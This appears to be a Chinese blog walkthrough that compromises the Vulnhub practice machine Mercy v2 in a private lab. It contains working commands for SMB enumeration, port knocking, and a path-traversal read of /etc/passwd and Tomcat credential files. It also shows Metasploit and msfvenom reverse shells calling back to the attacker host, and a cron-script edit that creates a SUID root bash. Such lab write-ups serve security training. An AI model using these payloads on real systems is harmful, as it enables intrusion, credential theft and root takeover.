Vulnhub:Digitalworld.local (Mercy v2)靶机

发布时间 2023-04-10 20:58:47作者: ctostm

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

使用enum4linux对目标smb服务进行枚举

enum4linux -a 192.168.111.130

目标文件共享的目录

image

目标存在的用户

image

8080端口的网站robots.txt提示存在一个文件

image

访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password

echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==' | base64 -d

image

image

使用用户qiu和密码:password,查看目标文件共享

smbclient -U qiu \\\\192.168.111.130\\qiu

image

在\.private\opensesame目录下存放有两个文件

image

查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中

image

image

使用knock进行端口碰撞开启22和80端口

knock 192.168.111.130 159 27391 4 -v
knock 192.168.111.130 17301 28504 9999 -v

image

漏洞利用

访问目标80的robots.txt,提示两个目录

image

其中/nomercy目录下的rips cms存在文件包含漏洞

image

searchsploit rips

image

image

http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/passwd

image

在8080端口首页存在提示:

注意:出于安全原因,使用管理器 Web 应用程序仅限于角色为“manager-gui”的用户。主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在 /etc/tomcat7/tomcat-users.xml 中定义。

image

文件包含/etc/tomcat7/tomcat-users.xml,在页面底部有用户fluffy和thisisasuperduperlonguser的密码

http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

image

使用thisisasuperduperlonguser用户登录8080端口的tomcat后台

image

image

拿shell的两种方法

第一种

使用msf模块exploit/multi/http/tomcat_mgr_upload上传反弹shell

use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.111.130
set rport 8080
set Httpusername thisisasuperduperlonguser
set httppassword heartbreakisinevitable
run

image

第二种

使用msfvenom生成war包,上传war包后执行反弹shell

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f war > shell1.war

image

使用7z查看war包内容

7z l shell1.war

image

上传后会自动生成目录(目录名为war包文件名),反弹shell为使用7z查看的.jsp后缀文件

image

image

访问http://192.168.111.130:8080/shell1/sjwdzibqunxeli.jsp获得反弹shell

image

提权

使用之前在/etc/tomcat7/tomcat-users.xml发现的fluffy用户密码切换到fluffy用户

image

在fluffy用户家目录下的.private/secrets目录中发现timeclock文件

image

猜测是计划任务(文件名提示这么明显了),同时该文件有777权限,修改文件内容提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> timeclock
/tmp/bash -p

image

image